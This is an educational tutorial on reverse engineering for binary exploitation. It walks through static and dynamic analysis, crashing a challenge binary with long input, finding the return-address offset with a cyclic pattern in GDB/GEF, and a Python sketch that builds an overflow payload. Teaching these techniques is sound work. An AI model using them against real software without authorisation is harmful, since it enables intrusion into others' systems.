Reverse Engineering for Pwn

Understand the binary and find vulnerabilities by analyzing it

Binary exploitation always starts with understanding the binary. This can be done in two ways: static analysis and dynamic analysis. In static analysis, you look at the code of the binary itself without executing it. In dynamic analysis, you run the binary and try inputs that might do something interesting. Often the best choice is a combination of both.

Static analysis

For really simple programs, you might get away with just dumping the assembly code and looking through it:

$ objdump -d ./binary
...
0000000000401405 <main>:
  401405:       55                      push   %rbp
  401406:       48 89 e5                mov    %rsp,%rbp
  401409:       48 83 ec 30             sub    $0x30,%rsp
  40140d:       e8 9c ff ff ff          call   4013ae <setup>
  401412:       e8 64 ff ff ff          call   40137b <banner>
  401417:       48 c7 45 d0 00 00 00    movq   $0x0,-0x30(%rbp)
...

However, this is very low-level code, which makes it hard to see the big picture. That is why we use decompilers, which try to reconstruct what the original source code might have looked like. Common ones include IDA and Ghidra.

When reading the decompiled C code, follow the steps the program takes and especially where your user input goes. The input may be written to a buffer that is smaller than the amount of input accepted, which can overflow it. When you find such a case, you can switch over to dynamic analysis to test your ideas.

A good thing to know before jumping straight into dynamic analysis on a compiled binary is that if you have the C source code, you can compile it with debug symbols yourself using the -g argument (or -ggdb, as used here, which produces debug information aimed at GDB):

$ gcc -ggdb main.c -o main
$ gdb ./main

This will not only show the source code while debugging but also give you access to local variables and structs. Using commands like p [variable] you can print local variables in a readable representation; for structs, this includes the names of the fields.

Example
     14  int main()
     15  {
     16      struct example var = {66, "Hello"};
     17      print(var);
     18      return 0;
     19  }
─────────────────────────────────────────────────────────────────────────────────────
gef➤  p var
$1 = {
  id = 0x42,
  name = 0x55555555600b "Hello"
}

Dynamic analysis

Dynamic analysis means running the program and testing things. In a buffer overflow, your input is bigger than the buffer it is written into. While you can try to find this through static analysis, it is often easiest to just test with a large input and see if the program crashes. For example:

Python
>>> "A"*200
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

Programs often take input from STDIN (standard input, typed after the program is started) or from command-line arguments. In some cases, they may also read files, connect to sockets, and more. When you find any sort of input, it is a good idea to try putting a large string in there just to be sure. For simpler binary exploitation challenges this will almost always reveal the vulnerability quickly:

$ ./binary
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault

When you see this Segmentation fault message, it is a clear sign that something in the program's memory was corrupted, causing it to crash. To view the error in more detail, you can run the dmesg command, which shows the kernel log entries written for such a fault.
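The same large-input test can be scripted. The following is a minimal sketch using only the Python standard library; the helper names run_with_input and segfaulted are made up for this example, and it assumes a POSIX system, where subprocess reports a process killed by a signal as a negative return code.

```python
import signal
import subprocess


def run_with_input(argv, data, timeout=5):
    """Run argv, feed data on STDIN, and return the process's return code."""
    proc = subprocess.run(
        argv,
        input=data,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        timeout=timeout,
    )
    return proc.returncode


def segfaulted(returncode):
    """On POSIX, a return code of -N means the process was killed by signal N."""
    return returncode == -signal.SIGSEGV
```

For the example binary above, a call such as segfaulted(run_with_input(["./binary"], b"A" * 200 + b"\n")) would be expected to return True if the overflow crashes the program.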

From here, you'll often want to find the exact offset in your payload to know what will be overwritten. This is often done using a de Bruijn sequence, also known as a cyclic pattern. This is a string in which every substring of a given length (4 characters by default) appears only once, so if you find such a substring in an error message, for example, you can look up exactly where in the string it came from. If you just saw "AAAA" instead, you would not know which part of the 200 A's it was.

A pattern like this can easily be generated using pwntools:

$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
# Also supports looking up the offset for a substring:
$ cyclic -l oaaa
56
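To see why such a pattern makes offsets recoverable, here is a minimal standard-library sketch of a de Bruijn generator. It is not pwntools' own code: the functions cyclic and cyclic_find below are local helpers that only mirror the tool's behaviour, and the lowercase alphabet with 4-character windows is assumed to match the tool's defaults.

```python
from itertools import islice


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every length-n window occurs only once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            # A candidate word is complete; emit it if its period divides n.
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """Return the first `length` characters of the pattern."""
    return "".join(islice(de_bruijn("abcdefghijklmnopqrstuvwxyz", n), length))


def cyclic_find(sub, length=200, n=4):
    """Return the offset of `sub` in the pattern, or -1 if it is absent."""
    return cyclic(length, n).find(sub)


print(cyclic(16))           # aaaabaaacaaadaaa
print(cyclic_find("oaaa"))  # 56
```

Because no 4-character window repeats, a plain substring search is enough to turn the crashed value back into an offset.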

Buffer overflows are about controlling the instruction pointer. When a crash happens, this is often because of a ret (return) instruction, which pops an address from the stack and jumps to it. If you have overflowed a buffer on the stack, you might have overwritten this return address, and the program will try to jump to the address your text represents. This address can be found easily using GDB with the GEF extension. You can run the binary, and when it crashes you will get a lot more information:

$ gdb ./binary
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2

GEF for linux ready, type 'gef' to start, 'gef config' to configure
90 commands loaded and 5 functions added for GDB 9.2 in 0.00ms using Python engine 3.8
gef➤ run
Starting program: ./binary

Input: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401602 in main ()
...
───────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffd708│+0x0000: "oaaapaaaqaa"  ← $rsp
0x007fffffffd710│+0x0008: 0x00000000616171 ("qaa"?)
0x007fffffffd718│+0x0010: 0x00000000401405  →  <main+0> push rbp
...
─────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x401601 <main+508>       leave
 →   0x401602 <main+509>       ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "labyrinth", stopped 0x401602 in main (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────── trace ────
gef➤ x $rsp
0x7fffffffd708: 0x6161616f

This x $rsp command examines the memory that the stack pointer register points to. The ret instruction that the program crashes at pops the top value off the stack and jumps to it. In this example the value was 0x6161616f, which we can look up with the cyclic tool:

$ cyclic -l 0x6161616f
56
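The value GDB prints and the text in the pattern are the same bytes seen two ways. As a small illustration (the helper name as_memory_bytes is made up for this example), the number can be converted back to the bytes as they sit in memory on a little-endian machine such as x86-64:

```python
def as_memory_bytes(value, width=4):
    """Return the bytes of `value` in little-endian (in-memory) order."""
    return value.to_bytes(width, "little")


print(as_memory_bytes(0x6161616F))  # b'oaaa'
```

This is why looking up 0x6161616f and looking up oaaa give the same offset.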

Now we know that we need 56 bytes of padding (for example 56 A's) to reach the saved return address, and that the bytes following them become the instruction pointer. Finding this offset is something you will have to do for almost every buffer overflow you find, so it is good to get used to it.
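With the offset known, a test payload could be laid out as in the sketch below. It assumes a 64-bit little-endian target, as the x86:64 label in the GEF output suggests. TARGET is purely illustrative: it reuses the address of main from the objdump listing, and a real exploit would put whatever address it wants to jump to there. build_payload is a hypothetical helper name.

```python
import struct

OFFSET = 56         # result of `cyclic -l` for this binary
TARGET = 0x401405   # illustrative only: address of main from the objdump output


def build_payload(offset, target):
    """Padding up to the saved return address, then the new 8-byte address."""
    padding = b"A" * offset
    return padding + struct.pack("<Q", target)  # "<Q" = little-endian 64-bit


payload = build_payload(OFFSET, TARGET)
print(len(payload))  # 64
```

If the offset is right, the program should crash or continue at the chosen address instead of at a value taken from the pattern.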

Input from file

In GDB, you don't have to type all your input yourself. Similarly to bash, you can redirect input from a file into your binary. This can also be really useful for inputting special characters while testing your payload.

gef➤ run < /path/to/file
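A payload containing bytes that are awkward to type can be written to such a file from Python. This is only a sketch: the file name payload.bin and the payload contents are made up for illustration, and the file is opened in binary mode so that no byte gets re-encoded.

```python
import os
import tempfile


def write_payload(data, path):
    """Write raw bytes to `path` and return the path."""
    with open(path, "wb") as f:
        f.write(data)
    return path


# Hypothetical payload: padding, then non-printable address bytes, then a newline.
payload = b"A" * 56 + b"\x05\x14\x40\x00\x00\x00\x00\x00" + b"\n"
path = write_payload(payload, os.path.join(tempfile.gettempdir(), "payload.bin"))
print(path)
```

The printed path can then be used with the run command shown above.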
